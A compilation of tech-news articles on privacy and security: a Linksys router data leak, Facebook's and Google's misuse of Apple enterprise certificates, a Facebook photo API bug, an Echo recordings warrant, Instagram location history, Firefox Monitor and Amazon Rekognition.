>20,000 Linksys routers leak historic record of every device ever connected

>20,000 Linksys routers leak historic record of every device ever connected

(credit: US Navy)

(credit: Troy Mursch)

Independent researcher Troy Mursch said the leak is the result of a flaw in almost three dozen models of Linksys routers. It took about 25 minutes for the Binary Edge search engine of Internet-connected devices to find 21,401 vulnerable devices on Friday. A scan earlier in the week found 25,617. They were leaking a total of 756,565 unique MAC addresses. Exploiting the flaw requires only a few lines of code that harvest every MAC address, device name, and operating system that has ever connected to each of them.

Read 9 remaining paragraphs | Comments

Google unveils auto-delete for location, Web activity, and app usage data

A large Google sign seen on a window of Google's headquarters.

Enlarge / Mountain View, Calif.—May 21, 2018: Exterior view of a Googleplex building, the corporate headquarters of Google and parent company Alphabet. (credit: Getty Images | zphotos)

Google will soon let users automatically delete location history and other private data in rolling intervals of either three months or 18 months.

“Choose a time limit for how long you want your activity data to be saved—3- or 18-months—and any data older than that will be automatically deleted from your account on an ongoing basis,” Google announced yesterday. “These controls are coming first to Location History and Web & App Activity and will roll out in the coming weeks.”

Google location history saves locations reported from mobile devices that are logged into your Google account, while saved Web and app activity includes “searches and other things you do on Google products and services, like Maps; your location, language, IP address, referrer, and whether you use a browser or an app; Ads you click, or things you buy on an advertiser’s site; [and] Information on your device like recent apps or contact names you searched for.”

Read 11 remaining paragraphs | Comments

Everything you need to know about Facebook, Google’s app scandal

Facebook and Google landed in hot water with Apple this week after two investigations by TechCrunch revealed the misuse of internal-only certificates — leading to their revocation, which led to a day of downtime at the two tech giants.

Confused about what happened? Here’s everything you need to know.

How did all this start, and what happened?

On Monday, we revealed that Facebook was misusing an Apple-issued enterprise certificate that is only meant for companies to use to distribute internal, employee-only apps without having to go through the Apple App Store. But the social media giant used that certificate to sign an app that Facebook distributed outside the company, violating Apple’s rules.

The app, known simply as “Research,” allowed Facebook unparalleled access to all of the data flowing out of a device. This included access to some of the users’ most sensitive network data. Facebook paid users — including teenagers — $20 per month to install the app. But it wasn’t clear exactly what kind of data was being vacuumed up, or for what reason.

It turns out that the app was a repackaged app that was effectively banned from Apple’s App Store last year for collecting too much data on users.

Apple was angry that Facebook was misusing its special-issue enterprise certificates to push an app it already banned, and revoked it — rendering the app unable to open. But Facebook was using that same certificate to sign its other employee-only apps, effectively knocking them offline until Apple re-issued the certificate.

Then, it turned out Google was doing almost exactly the same thing with its Screenwise app, and Apple’s ban-hammer fell again.

What’s the controversy over these enterprise certificates and what can they do?

If you want to develop Apple apps, you have to abide by its rules — and Apple expressly makes companies agree to its terms.

A key rule is that Apple doesn’t allow app developers to bypass the App Store, where every app is vetted to ensure it’s as secure as it can be. It does, however, grant exceptions for enterprise developers, such as to companies that want to build apps that are only used internally by employees. Facebook and Google in this case signed up to be enterprise developers and agreed to Apple’s developer terms.

Each Apple-issued certificate grants companies permission to distribute apps they develop internally — including pre-release versions of the apps they make, for testing purposes. But these certificates aren’t allowed to be used for ordinary consumers, as they have to download apps through the App Store.

What’s a “root” certificate, and why is its access a big deal?

Because Facebook’s Research and Google’s Screenwise apps were distributed outside of Apple’s App Store, it required users to manually install the app — known as sideloading. That requires users to go through a convoluted few steps of downloading the app itself, and opening and trusting either Facebook or Google’s enterprise developer code-signing certificate, which is what allows the app to run.

Both companies required users after the app installed to agree to an additional configuration step — known as a VPN configuration profile — allowing all of the data flowing out of that user’s phone to funnel down a special tunnel that directs it all to either Facebook or Google, depending on which app you installed.

This is where the Facebook and Google cases differ.

Google’s app collected data and sent it off to Google for research purposes, but couldn’t access encrypted data — such as the content of any network traffic protected by HTTPS, as most apps in the App Store and internet websites are.

Facebook, however, went far further. Its users were asked to go through an additional step to trust an additional type of certificate at the “root” level of the phone. Trusting this Facebook Research root certificate authority allowed the social media giant to look at all of the encrypted traffic flowing out of the device — essentially what we call a “man-in-the-middle” attack. That allowed Facebook to sift through your messages, your emails and any other bit of data that leaves your phone. Only apps that use certificate pinning — which reject any certificate that isn’t its own — were protected, such as iMessage, Signal and additionally any other end-to-end encrypted solutions.

Facebook’s Research app requires Root Certificate access, which Facebook gather almost any piece of data transmitted by your phone (Image: supplied)

Google’s app might not have been able to look at encrypted traffic, but the company still flouted the rules — and had its separate enterprise developer code-signing certificate revoked anyway.

What data did Facebook have access to on iOS?

It’s hard to know for sure, but it definitely had access to more data than Google.

Facebook said its app was to help it “understand how people use their mobile devices.” In reality, at root traffic level, Facebook could have accessed any kind of data that left your phone.

Will Strafach, a security expert with whom we spoke for our story, said: “If Facebook makes full use of the level of access they are given by asking users to install the certificate, they will have the ability to continuously collect the following types of data: private messages in social media apps, chats from in instant messaging apps – including photos/videos sent to others, emails, web searches, web browsing activity, and even ongoing location information by tapping into the feeds of any location tracking apps you may have installed.”

Remember: this isn’t “root” access to your phone, like jailbreaking, but root access to the network traffic.

How does this compare to the technical ways other market research programs work?

In fairness, these aren’t market research apps unique to Facebook or Google. Several other companies, like Nielsen and comScore, run similar programs, but neither ask users to install a VPN or provide root access to the network.

In any case, Facebook already has a lot of your data — as does Google. Even if the companies only wanted to look at your data in aggregate with other people, it can still hone in on who you talk to, when, for how long and, in some cases, what about. It might not have been such an explosive scandal had Facebook not spent the last year cleaning up after several security and privacy breaches.

Can they capture the data of people the phone owner interacts with?

In both cases, yes. In Google’s case, any unencrypted data that involves another person’s data could have been collected. In Facebook’s case, it goes far further — any data of yours that interacts with another person, such as an email or a message, could have been collected by Facebook’s app.

How many people did this affect?

It’s hard to know for sure. Neither Google nor Facebook have said how many users they have. Between them, it’s believed to be in the thousands. As for the employees affected by the app outages, Facebook has more than 35,000 employees and Google has more than 94,000 employees.

Why did internal apps at Facebook and Google break after Apple revoked the certificates?

You might own your Apple device, but Apple still gets to control what goes on it.

Apple can’t control Facebook’s root certificates, but it can control the enterprise certificates it issues. After Facebook was caught out, Apple said: “Any developer using their enterprise certificates to distribute apps to consumers will have their certificates revoked, which is what we did in this case to protect our users and their data.” That meant any app that relied on Facebook’s enterprise certificate — including inside the company — would fail to load. That’s not just pre-release builds of Facebook, Instagram and WhatsApp that staff were working on, but reportedly the company’s travel and collaboration apps were down. In Google’s case, even its catering and lunch menu apps were down.

Facebook’s internal apps were down for about a day, while Google’s internal apps were down for a few hours. None of Facebook or Google’s consumer services were affected, however.

How are people viewing Apple in all this?

Nobody seems thrilled with Facebook or Google at the moment, but not many are happy with Apple, either. Even though Apple sells hardware and doesn’t use your data to profile you or serve you ads — like Facebook and Google do — some are uncomfortable with how much power Apple has over the customers — and enterprises — that use its devices.

In revoking Facebook and Google’s enterprise certificates and causing downtime, it has a knock-on effect internally.

Is this legal in the U.S.? What about in Europe with GDPR?

Well, it’s not illegal — at least in the U.S. Facebook says it gained consent from its users. The company even said its teenage users must obtain parental consent, even though it was easily skippable and no verification checks were made. It wasn’t even explicitly clear that the children who “consented” really understood how much privacy they were really handing over.

That could lead to major regulatory headaches down the line. “If it turns out that European teens have been participating in the research effort Facebook could face another barrage of complaints under the bloc’s General Data Protection Regulation (GDPR) — and the prospect of substantial fines if any local agencies determine it failed to live up to consent and ‘privacy by design’ requirements baked into the bloc’s privacy regime,” wrote TechCrunch’s Natasha Lomas.

Who else has been misusing certificates?

Don’t think that Facebook and Google are alone in this. It turns out that a lot of companies might be flouting the rules, too.

According to many finding companies on social media, Sonos uses enterprise certificates for its beta program, as does finance app Binance, as well as DoorDash for its fleet of contractors. It’s not known if Apple will also revoke their enterprise certificates.

What next?

It’s anybody’s guess, but don’t expect this situation to die down any time soon.

Facebook may face repercussions with Europe, as well as at home. Two U.S. senators, Mark Warner and Richard Blumenthal, have already called for action, accusing Facebook of “wiretapping teens.” The Federal Trade Commission may also investigate, if Blumenthal gets his way.

Facebook bug exposed up to 6.8M users’ unposted photos to apps

Reset the “days since the last Facebook privacy scandal” counter, as Facebook has just revealed a Photo API bug gave app developers too much access to the photos of up to 5.6 million users. The bug allowed apps users had approved to pull their timeline photos to also receive their Facebook Stories, Marketplace photos, and most worryingly, photos they’d uploaded to Facebook but never shared. Facebook says the bug ran for 12 days from September 13th to September 25th. Facebook tells TechCrunch it discovered the breach on September 25th, and informed the European Union’s privacy watchdog the Office Of The Data Protection Commissioner (IDPC) on November 22nd. The IDPC has begun a statuatory inquiry into the breach.

Facebook provided merely a glib “We’re sorry this happened” in terms of an apology. It will provide tools next week for app developers to check if they were impacted and it will work with them to delete photos they shouldn’t have. The company plans to notify people it suspects may have been impacted by the bug via Facebook notification that will direct them to the Help Center where they’ll see if they used any apps impacted by the bug. It’s recommending users log into apps to check if they have wrongful photo access. Here’s a look at a mockup of warning notification users will see:

Facebook initially didn’t disclose when it discovered the bug, but in response to TechCrunch’s inquiry, a spokesperson says that it was discovered and fixed on September 25th. They say it took time for the company to investigate which apps and people were impacted, and build and translate the warning notification it will send impacted users. The delay could put Facebook at risk of GDPR fines for not promptly disclosing the issue within 72 hours that can go up to 20 million pounds or 4 percent of annual global revenue.

However, Facebook tells me it notified the IDPC that oversees GDPR on November 22nd, as soon as it established the bug was considered a reportable breach under GDPR guidelines. It says that it had to investigate to make that conclusion and let the IDPC know within 72 hours once it had. The head of communications for the IDPC Graham Doyle tells TechCrunch “The Irish DPC has received a number of breach notifications from Facebook since the introduction of the GDPR on May 25, 2018. With reference to these data breaches, including the breach in question, we have this week commenced a statutory inquiry examining Facebook’s compliance with the relevant provisions of the GDPR.”

Facebook tells me the bug did not impact photos privately shared through Messenger. The bug wouldn’t have exposed photos users never uploaded to Facebook from their camera roll or computer. But photos users uploaded but either decided not to post, that got interrupted by connectivity issues, or that they otherwise never finished sharing could have winded up with app developers.

The privacy failure will further weaken confidence that Facebook is a responsible steward for our private data. It follows Facebook’s massive security breach that allowed hackers to scrape 30 million people’s information back in September. There was also November’s bug allowing websites to read users’ Likes, October’s bug that mistakenly deleted people’s Live videos, and May’s bug that changed people’s status update composer privacy settings. It increasingly looks like the social network has gotten too big for the company to secure. Curiously, Facebook discovered the bug on September 25th, the same day as its 30 million user breach. Perhaps it kept a lid on the situation in hopes of not creating an even bigger scandal.

That it keeps photos you partially uploaded but never posted in the first place is creepy, but the fact that these could be exposed to third-party developers is truly unacceptable. And it seems Facebook is so tired of its failings that it couldn’t put forward even a seemingly heartfelt apology is telling. This company’s troubles are not only souring users on Facebook, but employees and the tech industry as large as well. CEO Mark Zuckerberg told Congress earlier this year that “We have a responsibility to protect your data, and if we can’t then we don’t deserve to serve you.” What does Facebook deserve at this point?

Facebook Portal adds games and web browser amidst mediocre Amazon reviews

After receiving a flogging from privacy critics, Facebook is scrambling to make its smart display video chat screen Portal more attractive to buyers. Today Facebook is announcing the addition of a web browser, plus some of Messenger’s Instant Games like Battleship, Draw Something, Sudoku and Words With Friends. ABC News and CNN are adding content to Portal, which now also has a manual zoom mode for its auto-zooming smart camera so you can zero in on a particular thing in view. Facebook has also added new augmented reality Story Time tales, seasonal AR masks, in-call music sharing through iHeartRadio beyond Spotify and Pandora that already offer it and nickname calling so you can say “Hey Portal, call Mom.”

But the question remains who’s buying? Facebook is already discounting the 10-inch-screen Portal and 15-inch Portal+. Formerly $100 off if you buy two, Facebook is still offering $50 off just one until Christmas Eve as part of a suspiciously long Black Friday Sale. That doesn’t signal this thing is flying off the shelves. We don’t have sales figures, but Portal has a 3.4 rating on Amazon, while Portal+ has a 3.6 — both trailing the 4.2 rating of Amazon’s own Echo Show’s 2. Users are griping about the lack of Amazon Video support for Ring doorbells, not receiving calls and, of course, the privacy implications.

Personally, I’ve found Portal+ to be competent in the five weeks since launch. The big screen is great as a smart photo frame and video calls look great. But Alexa and Facebook’s own voice assistant have a tough time dividing up functionality, and sometimes I can’t get either to play a specific song on Spotify, pause or change volume or other activities my Google Home has no trouble with. Facebook said it was hoping to add Google Assistant to Portal, but there’s no progress on that front yet.

The browser will be a welcome addition, and allow Facebook to sidestep some of the issues around its thin app platform. While it recently added a Smart TV version of YouTube, now users can access lots of services without those developers having to commit to building something for Portal given its uncertain future.

The hope seems to be that mainstream users who aren’t glued to the tech press where Facebook is constantly skewered might be drawn in by these device’s flashy screens and the admittedly impressive auto-zooming camera. But to overcome the brand tax levied by all of Facebook’s privacy scandals, Portal must be near perfect. Without the native apps for popular video providers like Netflix and Hulu, consistent voice recognition and more unique features missing from competing smart displays, the fear of Facebook’s surveillance may be outweighing people’s love for shiny new gadgets.

Judge orders Amazon to turn over Echo recordings in double murder case

A New Hampshire judge has ordered Amazon to turn over two days of Amazon Echo recordings in a double murder case.

Prosecutors believe that recordings from an Amazon Echo in a Farmington home where two women were murdered in January 2017 may yield further clues to their killer. Although police seized the Echo when they secured the crime scene, any recordings are stored on Amazon servers.

The order granting the search warrant, obtained by TechCrunch, said that there is “probable cause to believe” that the Echo picked up “audio recordings capturing the attack” and “any events that preceded or succeeded the attack.”

Amazon is also directed to turn over any “information identifying any cellular devices that were linked to the smart speaker during that time period,” the order said.

Timothy Verrill, a resident of neighboring Dover, New Hampshire, was charged with two counts of first-degree murder. He pleaded not guilty and awaits trial.

When reached, an Amazon spokesperson did not comment — but the company told the Associated Press last week that it won’t release the information “without a valid and binding legal demand properly served on us.”

New Hampshire doesn’t provide electronic access to court records, so it’s not readily known if Amazon has complied with the order, signed by Justice Steven Houran, on November 5.

A court order signed by New Hampshire Superior Court on November 5 ordering Amazon to turn over Echo recordings. (Image: TechCrunch)

It’s not the first time Amazon has been ordered to turn over recordings that prosecutors believe may help a police investigation.

Three years ago, an Arkansas man was accused of murder. Prosecutors pushed Amazon to turn over data from an Echo found in the house where the body was found. Amazon initially resisted the request citing First Amendment grounds — but later conceded and complied. Police and prosecutors generally don’t expect much evidence from Echo recordings — if any — because Echo speakers are activated with a wake word — usually “Alexa,” the name of the voice assistant. But, sometimes fragment of recordings can be inadvertently picked up, which could help piece together events from a crime scene.

But these two cases represent a fraction of the number of requests Amazon receives for Echo data. Although Amazon publishes a biannual transparency report detailing the number of warrants and orders it receives across its entire business, the company doesn’t — and refuses — to break down how many requests for data it receives for Echo data.

In most cases, any request for Echo recordings are only known through court orders.

In fact, when TechCrunch reached out to the major players in the smart home space, only one device maker had a transparency report and most had no future plans to publish one — leaving consumers in the dark on how these companies protect your private information from overly broad demands.

Although the evidence in the Verrill case is compelling, exactly what comes back from Amazon — or the company’s refusal to budge — will be telling.

Instagram prototypes handing your location history to Facebook

This is sure to exacerbate fears that Facebook will further exploit Instagram now that its founders have resigned. Instagram has been spotted prototyping a new privacy setting that would allow it to share your location history with Facebook. That means your exact GPS coordinates collected by Instagram, even when you’re not using the app, would help Facebook to target you with ads and recommend you relevant content. The geo-tagged data would appear to users in their Facebook Profile’s Activity Log, which include creepy daily maps of the places you been.

This commingling of data could upset users who want to limit Facebook’s surveillance of their lives. With Facebook installing its former VP of News Feed and close friend of Mark Zuckerberg, Adam Mosseri, as the head of Instagram, some critics have worried that Facebook would attempt to squeeze more value out of Instagram. Tat includes driving referral traffic to the main app via spammy notifications, inserting additional ads, or pulling in more data. Facebook was sued for breaking its promise to European regulators that it would not commingle WhatsApp and Facebook data, leading to an $122 million fine.

 

A Facebook spokesperson tells TechCrunch that “To confirm, we haven’t introduced updates to our location settings. As you know, we often work on ideas that may evolve over time or ultimately not be tested or released. Instagram does not currently store Location History; we’ll keep people updated with any changes to our location settings in the future.” That effectively confirms Location History sharing is something Instagram has prototyped, and that it’s considering launching but hasn’t yet.

The screenshots come courtesy of mobile researcher and frequent TechCrunch tipster Jane Manchun Wong. Her prior finds like prototypes of Instagram Video Calling and Music Stickers have drawn “no comments” from Instagram but then were officially launched in the following months. That lends credence to the idea that Instagram is serious about Location History.

Located in the Privacy and Security settings, the Location History option “Allows Facebook Products, including Instagram and Messenger, to build and use a history of precise locations received through Location Services on your device.”

A ‘Learn More’ button provides additional info (emphasis mine):

“Location History is a setting that allows Facebook to build a history of precise locations received through Location Services on your device. When Location History is on, Facebook will periodically add your current precise location to your Location History even if you leave the app. You can turn off Location History at any time in your Location Settings on the app. When Location History is turned off, Facebook will stop adding new information to your Location History which you can view in your Location Settings. Facebook may still receive your most recent precise location so that you can, for example, post content that’s tagged with your location. Location History helps you explore what’s around you, get more relevant ads, and helps improve Facebook. Location History must be turned on for some location feature to work on Facebook, including Find Wi-Fi and Nearby Friends.”

It’s unclear whether the feature would launch as opt-in or opt-out. [Correction: The prototype defaulted to off and Wong had to turn it on.] As part of a 2011 settlement with the FTC over privacy violations, Facebook agreed that “Material retroactive changes to the audience that can view the information users have previously shared on Facebook” must now be opt-in. But since Location History is never visible to other users and only deals with data Facebook sees, it’s exempt from that agreement and could be quietly added. If launched as opt-ou, most users might never dig deep enough into their privacy settings to turn the feature off. 

Delivering the exact history of where Instagram users went could assist Facebook with targeting them with local ads across its family of apps. If users are found to visit certain businesses, countries, neighborhoods, or schools, Facebook could use that data to infer which products they might want to buy and promote them. It could even show ads for restaurants or shops close to where users spend their days. Just yesterday, we reported that Facebook was testing a redesign of its Nearby Friends feature that replaces the list view of friends’ locations with a map. Pulling in Location History from Instagram could help keep that map up to date.

Sources tell TechCrunch that Instagram founders Kevin Systrom and Mike Krieger left the company following increasing tensions with Zuckerberg about dwindling autonomy of their app within the Facebook corporation. Systrom apparently clashed with Zuckerberg over how Instagram was supposed to contribute to Facebook success, especially as younger users began abandoning the older social network for the newer visual media app. Facebook is under pressure to keep up revenue growth despite it running out of News Feed ad inventory and users switching to Stories that advertisers are still acclimating to. Facebook is in heated competition with Google for last-mile local advertising and will take any advantage it can get.

Instagram has served as a life raft for Facebook’s brand this year amidst an onslaught of scandals including fake news, election interference, social media addiction, and most recently, a security breach that gave hackers the access tokens for 50 million users that could have let them take over their accounts. A survey of 1,153 US adults conducted in March 2018 found that 57 percent of them didn’t know Instagram was owned by Facebook. But if Facebook treats Instagram as a source of data and traffic it can strip mine, the negative perceptions associated with the parent could spill over onto the child.

Mozilla’s Firefox Monitor will now alert you when one of your accounts was hacked

Earlier this year, Mozilla announced Firefox Monitor, a service that tells you if your online accounts were hacked in a recent data breach. All you have to give it is your email address and it’ll use the Have I Been Pwned database to show you if you need to worry and what data was compromised. Today, Mozilla is taking this a step further by also letting you sign up for alerts for when your accounts appear in any (known) breaches in the future.

When it first launched, Mozilla considered Firefox Monitor an experimental service. Now, it’s being launched as an official service.

If none of your accounts have been hacked yet, consider yourself lucky. That still makes you the perfect user for Firefox Monitor’s new alerting feature, though, because chances are your email address will show up in a future breach sooner or later. Indeed, when Mozilla first asked people about which features they most wanted from a service like this, notifications about future breaches were very high on most peoples’ lists.

Mozilla notes that Firefox Monitor is just one of a number of new data and privacy features the organization has on its roadmap for the next few months. It’s clear that Mozilla is positioning itself as a neutral force and overall, that seems to be going quite well, especially given that Google’s Chrome browser is facing a bit of a backlash these days as users are increasingly concerned about their privacy and the vast trove of data Google collects.

Firefox will soon start blocking trackers by default

Congress members demand answers from Amazon about facial recognition software

When we called the ACLU’s Amazon’s Rekognition press release an “attention-grabbing stunt” when we wrote about it earlier today, well, consider that attention grabbed. Several Democratic members of Congress have responded with a strongly worded letter to founder Jeff Bezos.

Reps. Jimmy Gomez and John Lewis issued a letter to Bezos, after the ACLU noted that the facial recognition software falsely associated 28 images of Congress members with mugshots in a criminal database. Lewis, a pivotal figure in America’s civil rights moment, was among those falsely matched in the ACLU’s testing — particularly notable as the testing appeared to have a particular bias against people of color.

“The results of the ACLU’s test of Amazon’s ‘Rekognition’ software are deeply troubling,” Lewis wrote in a statement. “As a society, we need technology to help resolve human problems, not to add to the mountain of injustices presently facing people of color in this country. Black and brown people are already unjustly targeted through a discriminatory sentencing system that has led to mass incarceration and devastated millions of families.”

A trio of Congress members (Sen. Ed Markey and Reps. Luis Gutiérrez and Mark DeSaulnier), meanwhile, wrote a letter addressed to Bezos with a series of questions about the technology:

While facial recognition services might provide a valuable law enforcement tool, the efficacy and impact of the technology are not yet fully understood. In particular, serious concerns have been raised about the dangers facial recognition can pose to privacy and civil rights, especially when it is used as a tool of government surveillance, as well as the accuracy of the technology and its disproportionate impact on communities of color.

Amazon for its part, both defended Rekognition and disputed the ACLU’s methods. “We remain excited about how image and video analysis can be a driver for good in the world, including in the public sector and law enforcement,” the company wrote in a statement provided to TechCrunch.

With regard to testing, it says:

[W]e think that the results could probably be improved by following best practices around setting the confidence thresholds (this is the percentage likelihood that Rekognition found a match) used in the test. While 80% confidence is an acceptable threshold for photos of hot dogs, chairs, animals, or other social media use cases, it wouldn’t be appropriate for identifying individuals with a reasonable level of certainty. When using facial recognition for law enforcement activities, we guide customers to set a threshold of at least 95% or higher.

The company also reiterated an earlier statement that the results are intended to be used to narrow down results, rather than lead directly to arrests.

Regardless, the ACLU’s stunt certainly got the attention the organization was seeking, both with regard to the aforementioned biases and broader security implications of facial scanning for law enforcement.